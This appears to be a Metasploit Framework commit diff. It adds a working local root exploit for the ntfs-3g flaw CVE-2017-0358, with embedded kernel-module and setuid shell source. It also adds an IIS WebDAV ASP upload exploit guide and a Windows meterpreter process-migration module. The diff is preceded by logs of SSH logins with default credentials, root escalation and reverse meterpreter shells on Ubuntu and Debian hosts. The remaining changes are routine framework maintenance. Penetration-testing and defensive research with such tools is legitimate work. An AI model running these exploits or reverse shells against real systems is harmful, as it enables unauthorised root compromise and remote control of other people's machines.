[*] Command shell session 1 opened (192.168.2.117:37241 -> 192.168.2.197:22) at 2017-02-25 21:48:06 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
#### Escalate
resource (ntfs3g.rc)> use exploit/linux/local/ntfs3g_priv_esc
resource (ntfs3g.rc)> set verbose true
verbose => true
resource (ntfs3g.rc)> set session 1
session => 1
resource (ntfs3g.rc)> set target 1
target => 1
resource (ntfs3g.rc)> set lhost 192.168.2.117
lhost => 192.168.2.117
resource (ntfs3g.rc)> check
[!] SESSION may not be compatible with this module.
[+] Vulnerable Ubuntu 16.10 detected
[*] The target appears to be vulnerable.
resource (ntfs3g.rc)> exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444
[+] Vulnerable Ubuntu 16.10 detected
[+] make is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing files to target
[*] Writing rootshell to /tmp/rootshell.c
[*] Max line length is 65537
[*] Writing 345 bytes in 1 chunks of 1198 bytes (octal-encoded), using printf
[*] Writing sploit to /tmp/sploit.c
[*] Max line length is 65537
[*] Writing 7632 bytes in 1 chunks of 26966 bytes (octal-encoded), using printf
[*] Writing rootmod to /tmp/rootmod.c
[*] Max line length is 65537
[*] Writing 1115 bytes in 1 chunks of 4016 bytes (octal-encoded), using printf
[*] Writing Makefile to /tmp/Makefile
[*] Max line length is 65537
[*] Writing 18 bytes in 1 chunks of 66 bytes (octal-encoded), using printf
[*] Writing payload to /tmp/ECldPeni
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 567 bytes (octal-encoded), using printf
[*] Starting execution of priv esc.
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2440248 bytes) to 192.168.2.197
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.197:40746) at 2017-02-25 21:48:39 -0500
[!] This exploit may require manual cleanup of '/tmp/rootshell.c' on the target
[!] This exploit may require manual cleanup of '/tmp/rootshell' on the target
[!] This exploit may require manual cleanup of '/tmp/sploit.c' on the target
[!] This exploit may require manual cleanup of '/tmp/sploit' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.c' on the target
[!] This exploit may require manual cleanup of '/tmp/Makefile' on the target
[!] This exploit may require manual cleanup of '/tmp/ECldPeni' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.ko' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.mod.c' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.mod.o' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.o' on the target
meterpreter > sysinfo
Computer : 192.168.2.197
OS : Ubuntu 16.10 (Linux 4.8.0-22-generic)
Architecture : x64
Meterpreter : x64/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
### Debian 8.7.1 (ntfs-3g 1:2014.2.15AR.2-1+deb8u2)
#### Initial Access
[*] Processing ntfs3g.rc for ERB directives.
resource (ntfs3g.rc)> use auxiliary/scanner/ssh/ssh_login
resource (ntfs3g.rc)> set rhosts 192.168.2.83
rhosts => 192.168.2.83
resource (ntfs3g.rc)> set username debian
username => debian
resource (ntfs3g.rc)> set password debian
password => debian
resource (ntfs3g.rc)> exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'debian:debian' 'uid=1000(debian) gid=1000(debian) groups=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(scanner),115(bluetooth) Linux debian871 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.117:40679 -> 192.168.2.83:22) at 2017-02-25 22:17:49 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
#### Escalate
resource (ntfs3g.rc)> use exploit/linux/local/ntfs3g_priv_esc
resource (ntfs3g.rc)> set verbose true
verbose => true
resource (ntfs3g.rc)> set session 1
session => 1
resource (ntfs3g.rc)> set target 1
target => 1
resource (ntfs3g.rc)> set lhost 192.168.2.117
lhost => 192.168.2.117
resource (ntfs3g.rc)> check
[!] SESSION may not be compatible with this module.
[+] Vulnerable Debian 8 (jessie) detected
[*] The target appears to be vulnerable.
resource (ntfs3g.rc)> exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444
[+] Vulnerable Debian 8 (jessie) detected
[+] make is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing files to target
[*] Writing rootshell to /tmp/rootshell.c
[*] Max line length is 65537
[*] Writing 345 bytes in 1 chunks of 1198 bytes (octal-encoded), using printf
[*] Writing sploit to /tmp/sploit.c
[*] Max line length is 65537
[*] Writing 7632 bytes in 1 chunks of 26966 bytes (octal-encoded), using printf
[*] Writing rootmod to /tmp/rootmod.c
[*] Max line length is 65537
[*] Writing 1115 bytes in 1 chunks of 4016 bytes (octal-encoded), using printf
[*] Writing Makefile to /tmp/Makefile
[*] Max line length is 65537
[*] Writing 18 bytes in 1 chunks of 66 bytes (octal-encoded), using printf
[*] Writing payload to /tmp/cCacqozW
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 567 bytes (octal-encoded), using printf
[*] Starting execution of priv esc.
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2440248 bytes) to 192.168.2.83
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.83:48762) at 2017-02-25 22:18:27 -0500
meterpreter > sysinfo
Computer : 192.168.2.83
OS : Debian 8.7 (Linux 3.16.0-4-amd64)
Architecture : x64
Meterpreter : x64/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

8
documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md
View File

@ -13,8 +13,12 @@ cd taco
vim config/environments/development.rb
```
Add the following line just before the final `end' tag:
```config.web_console.whitelisted_ips = %w(0.0.0.0/0)```
Add the following line just before the final `end` tag:
```config.web_console.whitelisted_ips = %w(0.0.0.0/0)```
```
bundle

2
documentation/modules/exploit/unix/webapp/piwik_superuser_plugin_upload.md
View File

@ -5,6 +5,8 @@ Older builds are also available from [builds.piwik.org](https://builds.piwik.org
This module was tested with Piwik versions 2.14.0, 2.16.0, 2.17.1 and 3.0.1
Piwik disabled custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you have to enable custom plugin uploads via the config file.
## Verification Steps
### Install Piwik (Debian/Ubuntu)

49
documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md Executable file
View File

@ -0,0 +1,49 @@
## Description
This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script via a WebDAV PUT request.
**IMPORTANT:** The target IIS machine must meet these conditions to be considered as exploitable:
1. It allows 'Script resource access'.
2. It allows Read and Write permission.
3. It supports ASP.
## WebDAV
Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol (HTTP) that allows clients to perform remote Web content authoring operations. WebDAV is defined in RFC 4918 by a working group of the Internet Engineering Task Force.
## Verification Steps
1. Do: ```use exploit/windows/iis/iis_webdav_upload_asp```
2. Do: ```set payload windows/meterpreter/reverse_tcp```
2. Do: ```set LHOST [IP]```
3. Do: ```set RHOST [IP]```
3. Do: ```set PATH / [PATH]```
4. Do: ```run```
## Sample Output
```
msf > use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(iis_webdav_upload_asp) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(iis_webdav_upload_asp) > set RHOST 172.16.176.54
RHOST => 172.16.176.54
msf exploit(iis_webdav_upload_asp) > set LHOST 172.16.176.56
LHOST => 172.16.176.54
msf exploit(iis_webdav_upload_asp) > set path /upload/test.asp
path => /upload/test.asp
msf exploit(iis_webdav_upload_asp) > exploit
[*] Started reverse handler on 172.16.176.56:4444
[*] Uploading 613830 bytes to /upload/test.txt...
[*] Moving /upload/test.txt to /upload/test.asp...
[*] Executing /upload/test.asp...
[*] Sending stage (770048 bytes) to 172.16.176.54
[*] Deleting /upload/test.asp, this doesn't always work...
[!] Deletion failed on /upload/test.asp [403 Forbidden]
meterpreter > getuid
Server username: JUAN-C0DE875735\IWAM_JUAN-C0DE875735
meterpreter >
```

1
lib/metasploit/framework/command/console.rb
View File

@ -82,6 +82,7 @@ class Metasploit::Framework::Command::Console < Metasploit::Framework::Command::
driver_options['DeferModuleLoads'] = options.modules.defer_loads
driver_options['DisableBanner'] = options.console.quiet
driver_options['DisableDatabase'] = options.database.disable
driver_options['HistFile'] = options.console.histfile
driver_options['LocalOutput'] = options.console.local_output
driver_options['ModulePath'] = options.modules.path
driver_options['Plugins'] = options.console.plugins

5
lib/metasploit/framework/parsed_options/console.rb
View File

@ -10,6 +10,7 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par
options.console.commands = []
options.console.confirm_exit = false
options.console.histfile = nil
options.console.local_output = nil
options.console.plugins = []
options.console.quiet = false
@ -39,6 +40,10 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par
options.console.confirm_exit = true
end
option_parser.on('-H', '--history-file FILE', 'Save command history to the specified file') do |file|
options.console.histfile = file
end
option_parser.on('-L', '--real-readline', 'Use the system Readline library instead of RbReadline') do
options.console.real_readline = true
end

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.14.8"
VERSION = "4.14.10"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

6
lib/msf/core/db_manager/import.rb
View File

@ -299,7 +299,11 @@ module Msf::DBManager::Import
@import_filedata[:type] = "Nikto XML"
return :nikto_xml
when "nmaprun"
@import_filedata[:type] = "Nmap XML"
if line.start_with?('<nmaprun scanner="masscan"')
@import_filedata[:type] = "Masscan XML"
else
@import_filedata[:type] = "Nmap XML"
end
return :nmap_xml
when "openvas-report"
@import_filedata[:type] = "OpenVAS"

4
lib/msf/core/exploit/http/client.rb
View File

@ -314,7 +314,7 @@ module Exploit::Remote::HttpClient
print_line('#' * 20)
print_line('# Response:')
print_line('#' * 20)
print_line(res.to_s)
print_line(res.to_terminal_output)
end
res
@ -360,7 +360,7 @@ module Exploit::Remote::HttpClient
print_line('#' * 20)
print_line('# Response:')
print_line('#' * 20)
print_line(res.to_s)
print_line(res.to_terminal_output)
end
disconnect(c)
res

10
lib/msf/core/modules/loader/executable.rb
View File

@ -82,6 +82,14 @@ class Msf::Modules::Loader::Executable < Msf::Modules::Loader::Base
load_error(full_path, Errno::ENOENT.new)
return ''
end
Msf::Modules::External::Shim.generate(full_path)
begin
Msf::Modules::External::Shim.generate(full_path)
rescue ::Exception => e
elog "Unable to load module #{full_path} #{e.class} #{e}"
# XXX migrate this to a full load_error when we can tell the user why the
# module did not load and/or how to resolve it.
# load_error(full_path, e)
''
end
end
end

18
lib/msf/core/reflective_dll_loader.rb
View File

@ -13,7 +13,7 @@ module Msf::ReflectiveDLLLoader
# Load a reflectively-injectable DLL from disk and find the offset
# to the ReflectiveLoader function inside the DLL.
#
# @param dll_path Path to the DLL to load.
# @param [String] dll_path Path to the DLL to load.
#
# @return [Array] Tuple of DLL contents and offset to the
# +ReflectiveLoader+ function within the DLL.
@ -23,18 +23,26 @@ module Msf::ReflectiveDLLLoader
offset = parse_pe(dll)
unless offset
raise "Cannot find the ReflectiveLoader entry point in #{dll_path}"
end
return dll, offset
end
# Load a reflectively-injectable DLL from an string and find the offset
# Load a reflectively-injectable DLL from a string and find the offset
# to the ReflectiveLoader function inside the DLL.
#
# @param [Integer] dll_data the DLL to load.
# @param [String] dll_data the DLL data to load.
#
# @return [Integer] offset to the +ReflectiveLoader+ function within the DLL.
def load_rdi_dll_from_data(dll_data)
offset = parse_pe(dll_data)
unless offset
raise 'Cannot find the ReflectiveLoader entry point in DLL data'
end
offset
end
@ -51,10 +59,6 @@ module Msf::ReflectiveDLLLoader
end
end
unless offset
raise "Cannot find the ReflectiveLoader entry point in #{dll_path}"
end
offset
end
end

2
lib/msf/core/rpc/v10/client.rb
View File

@ -36,7 +36,7 @@ class Client
:port => 3790,
:uri => '/api/',
:ssl => true,
:ssl_version => 'TLS1',
:ssl_version => 'TLS1.2',
:context => {}
}.merge(info)

1
lib/msf/ui/console/command_dispatcher/db.rb
View File

@ -1316,6 +1316,7 @@ class Db
print_line " IP360 ASPL"
print_line " IP360 XML v3"
print_line " Libpcap Packet Capture"
print_line " Masscan XML"
print_line " Metasploit PWDump Export"
print_line " Metasploit XML"
print_line " Metasploit Zip Export"

2
lib/msf/util/exe.rb
View File

@ -631,7 +631,7 @@ require 'msf/core/exe/segment_appender'
opts[:framework] = framework
opts[:payload] = 'stdin'
opts[:encoder] = '@x86/service,'+opts[:serviceencoder]
opts[:encoder] = '@x86/service,'+(opts[:serviceencoder] || '')
venom_generator = Msf::PayloadGenerator.new(opts)
code_service = venom_generator.multiple_encode_payload(code)

13
lib/rex/parser/nmap_nokogiri.rb
View File

@ -190,7 +190,11 @@ module Rex
return unless in_tag("host")
attrs.each do |k,v|
next unless k == "state"
@state[:host_alive] = (v == "up")
if v == 'up'
@state[:host_alive] = true
else
@state[:host_alive] = false
end
end
end
@ -228,10 +232,13 @@ module Rex
end
def collect_host_data
if @state[:host_alive]
if @state[:host_alive] == true
@report_data[:state] = Msf::HostState::Alive
else
elsif @state[:host_alive] == false
@report_data[:state] = Msf::HostState::Dead
# Default to alive if no host state available (masscan)
else
@report_data[:state] = Msf::HostState::Alive
end
if @state[:addresses]
if @state[:addresses].has_key? "ipv4"

36
lib/rex/proto/http/packet.rb
View File

@ -163,10 +163,25 @@ class Packet
chunked += "0\r\n\r\n"
end
#
# Outputs a readable string of the packet for terminal output
#
def to_terminal_output
output_packet(true)
end
#
# Converts the packet to a string.
#
def to_s
output_packet(false)
end
#
# Converts the packet to a string.
# If ignore_chunk is set the chunked encoding is omitted (for pretty print)
#
def output_packet(ignore_chunk=false)
content = self.body.to_s.dup
# Update the content length field in the header with the body length.
@ -187,16 +202,18 @@ class Packet
end
end
if (self.auto_cl == true && self.transfer_chunked == true)
raise RuntimeError, "'Content-Length' and 'Transfer-Encoding: chunked' are incompatible"
elsif self.auto_cl == true
self.headers['Content-Length'] = content.length
elsif self.transfer_chunked == true
if self.proto != '1.1'
raise RuntimeError, 'Chunked encoding is only available via 1.1'
unless ignore_chunk
if (self.auto_cl == true && self.transfer_chunked == true)
raise RuntimeError, "'Content-Length' and 'Transfer-Encoding: chunked' are incompatible"
elsif self.auto_cl == true
self.headers['Content-Length'] = content.length
elsif self.transfer_chunked == true
if self.proto != '1.1'
raise RuntimeError, 'Chunked encoding is only available via 1.1'
end
self.headers['Transfer-Encoding'] = 'chunked'
content = self.chunk(content, self.chunk_min_size, self.chunk_max_size)
end
self.headers['Transfer-Encoding'] = 'chunked'
content = self.chunk(content, self.chunk_min_size, self.chunk_max_size)
end
end
@ -411,4 +428,3 @@ end
end
end
end

2
metasploit-framework.gemspec
View File

@ -55,6 +55,8 @@ Gem::Specification.new do |spec|
spec.add_runtime_dependency 'json'
# Metasm compiler/decompiler/assembler
spec.add_runtime_dependency 'metasm'
# Metasploit::Aggregator external session proxy
spec.add_runtime_dependency 'metasploit-aggregator'
# Metasploit::Concern hooks
spec.add_runtime_dependency 'metasploit-concern'
# Metasploit::Credential database models

276
modules/exploits/linux/local/ntfs3g_priv_esc.rb Normal file
View File

@ -0,0 +1,276 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info, {
'Name' => 'Debian/Ubuntu ntfs-3g Local Privilege Escalation',
'Description' => %q{
ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe.
This can be abused to load a kernel module and execute a binary payload as the root user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'jannh@google.com', # discovery
'h00die <mike@shorebreaksecurity.com>' # metasploit module
],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'References' =>
[
[ 'CVE', '2017-0358' ],
[ 'EDB', '41356' ],
[ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1072' ]
],
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' =>
{
'payload' => 'linux/x64/mettle/reverse_tcp',
'PrependFork' => true,
},
'DefaultTarget' => 1,
'DisclosureDate' => 'Jan 05 2017',
'Privileged' => true
}
))
register_options([
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
], self.class)
end
def check
# check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
def headers_installed?()
output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
if output
if output.include?('linux-headers')
return true
else
print_error('Linux kernel headers not available, compiling will fail.')
return false
end
end
false
end
output = cmd_exec('dpkg -l ntfs-3g | grep \'^ii\'')
if output
if output.include?('1:2015.3.14AR.1-1build1') #Ubuntu 16.04 LTS
print_good('Vulnerable Ubuntu 16.04 detected')
CheckCode::Appears
elsif output.include?('1:2016.2.22AR.1-3') #Ubuntu 16.10
print_good('Vulnerable Ubuntu 16.10 detected')
CheckCode::Appears
elsif output.include?('1:2012.1.15AR.5-2.1+deb7u2') #Debian Wheezy, we also need linux-source installed
print_good('Vulnerable Debian 7 (wheezy) detected')
if headers_installed?()
CheckCode::Appears
else
CheckCode::Safe
end
CheckCode::Appears
elsif output.include?('1:2014.2.15AR.2-1+deb8u2') #Debian Jessie, we also need linux-source installed
print_good('Vulnerable Debian 8 (jessie) detected')
if headers_installed?()
CheckCode::Appears
else
CheckCode::Safe
end
CheckCode::Appears
else
print_error("Version installed not vulnerable: #{output}")
CheckCode::Safe
end
else
print_error('ntfs-3g not installed')
CheckCode::Safe
end
end
def exploit
def upload_and_compile(filename, file_path, file_content, compile=nil)
rm_f "#{file_path}"
if not compile.nil?
rm_f "#{file_path}.c"
vprint_status("Writing #{filename} to #{file_path}.c")
write_file("#{file_path}.c", file_content)
register_file_for_cleanup("#{file_path}.c")
output = cmd_exec(compile)
if output != ''
print_error(output)
fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile")
end
else
vprint_status("Writing #{filename} to #{file_path}")
write_file(file_path, file_content)
end
cmd_exec("chmod +x #{file_path}");
register_file_for_cleanup(file_path)
end
# These are direct copies of the modules from EDB
rootmod = %q{
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/cred.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
static int suidfile_fd = -1;
module_param(suidfile_fd, int, 0);
static int __init init_rootmod(void) {
int (*sys_fchown_)(int fd, int uid, int gid);
int (*sys_fchmod_)(int fd, int mode);
const struct cred *kcred, *oldcred;
sys_fchown_ = (void*)kallsyms_lookup_name("sys_fchown");
sys_fchmod_ = (void*)kallsyms_lookup_name("sys_fchmod");
printk(KERN_INFO "rootmod loading\n");
kcred = prepare_kernel_cred(NULL);
oldcred = override_creds(kcred);
sys_fchown_(suidfile_fd, 0, 0);
sys_fchmod_(suidfile_fd, 06755);
revert_creds(oldcred);
return -ELOOP; /* fake error because we don't actually want to end up with a loaded module */
}
static void __exit cleanup_rootmod(void) {}
module_init(init_rootmod);
module_exit(cleanup_rootmod);
MODULE_LICENSE("GPL v2");
}
rootshell = %q{
#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/types.h>
int main(void) {
if (setuid(0) || setgid(0))
err(1, "setuid/setgid");
fputs("we have root privs now...\n", stderr);
execl("/bin/bash", "bash", NULL);
err(1, "execl");
}
}
# we moved sploit.c off since it was so big to the external sources folder
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2017-0358', 'sploit.c')
fd = ::File.open( path, "rb")
sploit = fd.read(fd.stat.size)
fd.close
rootmod_filename = 'rootmod'
rootmod_path = "#{datastore['WritableDir']}/#{rootmod_filename}"
rootshell_filename = 'rootshell'
rootshell_path = "#{datastore['WritableDir']}/#{rootshell_filename}"
sploit_filename = 'sploit'
sploit_path = "#{datastore['WritableDir']}/#{sploit_filename}"
payload_filename = rand_text_alpha(8)
payload_path = "#{datastore['WritableDir']}/#{payload_filename}"
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
def has_prereqs?()
def check_gcc?()
gcc = cmd_exec('which gcc')
if gcc.include?('gcc')
vprint_good('gcc is installed')
return true
else
print_error('gcc is not installed. Compiling will fail.')
return false
end
end
def check_make?()
make = cmd_exec('which make')
if make.include?('make')
vprint_good('make is installed')
return true
else
print_error('make is not installed. Compiling will fail.')
return false
end
end
return check_make?() && check_gcc?()
end
if has_prereqs?()
vprint_status('Live compiling exploit on system')
else
fail_with(Failure::Unknown, 'make and gcc required on system to build exploit for kernel')
end
# make our substitutions so things are dynamic
rootshell.gsub!(/execl\("\/bin\/bash", "bash", NULL\);/,
"return execl(\"#{payload_path}\", \"\", NULL);") #launch our payload, and do it in a return to not freeze the executable
print_status('Writing files to target')
cmd_exec("cd #{datastore['WritableDir']}")
#write all the files and compile. This is equivalent to the original compile.sh
#gcc -o rootshell rootshell.c -Wall
upload_and_compile('rootshell', rootshell_path, rootshell, "gcc -o #{rootshell_filename} #{rootshell_filename}.c -Wall")
#gcc -o sploit sploit.c -Wall -std=gnu99
upload_and_compile('sploit', sploit_path, sploit, "gcc -o #{sploit_filename} #{sploit_filename}.c -Wall -std=gnu99")
#make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
upload_and_compile('rootmod', "#{rootmod_path}.c", rootmod, nil)
upload_and_compile('Makefile', "#{datastore['WritableDir']}/Makefile", 'obj-m := rootmod.o', nil)
cmd_exec('make -C /lib/modules/$(uname -r)/build M=$(pwd) modules')
upload_and_compile('payload', payload_path, generate_payload_exe)
#This is equivalent to the 2nd half of the compile.sh file
cmd_exec('mkdir -p depmod_tmp/lib/modules/$(uname -r)')
cmd_exec('cp rootmod.ko depmod_tmp/lib/modules/$(uname -r)/')
cmd_exec('/sbin/depmod -b depmod_tmp/')
cmd_exec('cp depmod_tmp/lib/modules/$(uname -r)/*.bin .')
cmd_exec('rm -rf depmod_tmp')
register_file_for_cleanup("#{rootmod_path}.ko")
register_file_for_cleanup("#{rootmod_path}.mod.c")
register_file_for_cleanup("#{rootmod_path}.mod.o")
register_file_for_cleanup("#{rootmod_path}.o")
# and here we go!
print_status('Starting execution of priv esc.')
output = cmd_exec(sploit_path)
unless session_created?
# this could also be output.include?('we have root privs now...'), however session_created handles some additional cases like elevation happened,
# but binary payload was caught, or NIPS shut down the callback etc.
vprint_error(output)
end
end
def on_new_session(session)
# if we don't /bin/bash here, our payload times out
# [*] Meterpreter session 2 opened (192.168.199.131:4444 -> 192.168.199.130:37022) at 2016-09-27 14:15:04 -0400
# [*] 192.168.199.130 - Meterpreter session 2 closed. Reason: Died
session.shell_command_token('/bin/bash')
super
end
end

13
modules/exploits/unix/webapp/piwik_superuser_plugin_upload.rb
View File

@ -20,7 +20,9 @@ class MetasploitModule < Msf::Exploit::Remote
This module will generate a plugin, pack the payload into it
and upload it to a server running Piwik. Superuser Credentials are
required to run this module. This module does not work against Piwik 1
as there is no option to upload custom plugins.
as there is no option to upload custom plugins. Piwik disabled
custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you
have to enable custom plugin uploads via the config file.
Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.
},
'License' => MSF_LICENSE,
@ -30,7 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
],
'References' =>
[
[ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ]
[ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ],
[ 'URL', 'https://piwik.org/faq/plugins/faq_21/' ],
[ 'URL', 'https://piwik.org/changelog/piwik-3-0-3/' ]
],
'DisclosureDate' => 'Feb 05 2017',
'Platform' => 'php',
@ -314,6 +318,10 @@ class MetasploitModule < Msf::Exploit::Remote
upload_nonce = nil
if res && res.code == 200
if res.body =~ /Plugin upload is disabled in config file/
fail_with(Failure::NotVulnerable, 'Custom plugin uploads are disabled')
end
match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m)
if match
upload_nonce = match[1]
@ -362,4 +370,3 @@ class MetasploitModule < Msf::Exploit::Remote
}, 5)
end
end

73
modules/post/windows/manage/archmigrate.md Normal file
View File

@ -0,0 +1,73 @@
## Creating A Testing Environment
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
This module has been tested against:
1. Windows 10.
2. Windows 7.
3. Windows Server 2008R2
This module was not tested against, but may work against:
1. Other versions of Windows that are x64.
## Verification Steps
1. Start msfconsole
2. Obatin a meterpreter session with an executable meterpreter via whatever method
3. Do: 'use post/windows/manage/archmigrate'
4. Do: 'set session #'
5. Do: 'run'
## Scenarios
### Windows 10 x64
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
meterpreter > sysinfo
Computer : DESKTOP-SO4MCA3
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate
msf post(archmigrate) > set session 1
session => 1
msf post(archmigrate) > run
[*] The meterpreter is not the same architecture as the OS! Upgrading!
[*] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] Got pid 1772
[*] Migrating..
[+] Success!
[*] Post module execution completed
msf post(archmigrate) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-SO4MCA3\tmoose @ DESKTOP-SO4MCA3 <MSF_IP>:4567 -> <Win10x64_IP>:50917 (<Win10x64_IP>)
msf post(archmigrate) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-SO4MCA3
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows

91
modules/post/windows/manage/archmigrate.rb Normal file
View File

@ -0,0 +1,91 @@
require 'msf/core'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::File
include Msf::Post::Common
def initialize(info = {})
super(update_info(
info,
'Name' => 'Architecture Migrate',
'Description' => %q(This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a
new process with the correct architecture and migrates into that process.),
'License' => MSF_LICENSE,
'Author' => ['Koen Riepe (koen.riepe@fox-it.com)'],
'References' => [''],
'Platform' => [ 'win' ],
'Arch' => [ 'x86', 'x64' ],
'SessionTypes' => [ 'meterpreter' ]
)
)
register_options(
[
OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ])
],
self.class
)
end
def check_32_on_64
begin
apicall = session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"]
# railgun returns '\x00\x00\x00\x00' if the meterpreter process is 64bits.
if apicall == "\x00\x00\x00\x00"
migrate = false
else
migrate = true
end
return migrate
rescue
print_error('Railgun not available, this module only works for binary meterpreters.')
end
end
def get_windows_loc
apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir", 255, 255)["lpBuffer"]
windir = apicall.split(":")[0]
return windir
end
def run
if check_32_on_64
print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
newproc = datastore['EXE']
if exist?(newproc)
print_status("Starting new x64 process #{newproc}")
pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid
print_good("Got pid #{pid}")
print_status('Migrating..')
session.core.migrate(pid)
if pid == session.sys.process.getpid
print_good('Success!')
else
print_error('Migration failed!')
end
else
print_error('The selected executable to migrate into does not exist')
if datastore['FALLBACK']
windir = get_windows_loc
newproc = "#{windir}:\\windows\\sysnative\\svchost.exe"
if exist?(newproc)
print_status("Starting new x64 process #{newproc}")
pid = session.sys.process.execute(newproc, nil, { 'Hidden' => true, 'Suspended' => true }).pid
print_good("Got pid #{pid}")
print_status('Migrating..')
session.core.migrate(pid)
if pid == session.sys.process.getpid
print_good('Success!')
else
print_error('Migration failed!')
end
end
end
end
else
print_good('The meterpreter is the same architecture as the OS!')
end
end
end

1
spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
View File

@ -89,6 +89,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
" IP360 ASPL",
" IP360 XML v3",
" Libpcap Packet Capture",
" Masscan XML",
" Metasploit PWDump Export",
" Metasploit XML",
" Metasploit Zip Export",

2
tools/dev/msftidy.rb
View File

@ -578,7 +578,7 @@ class Msftidy
next if ln =~ /^[[:space:]]*#/
if ln =~ /\$std(?:out|err)/i or ln =~ /[[:space:]]puts/
next if ln =~ /^[\s]*["][^"]+\$std(?:out|err)/
next if ln =~ /["'][^"']*\$std(?:out|err)[^"']*["']/
no_stdio = false
error("Writes to stdout", idx)
end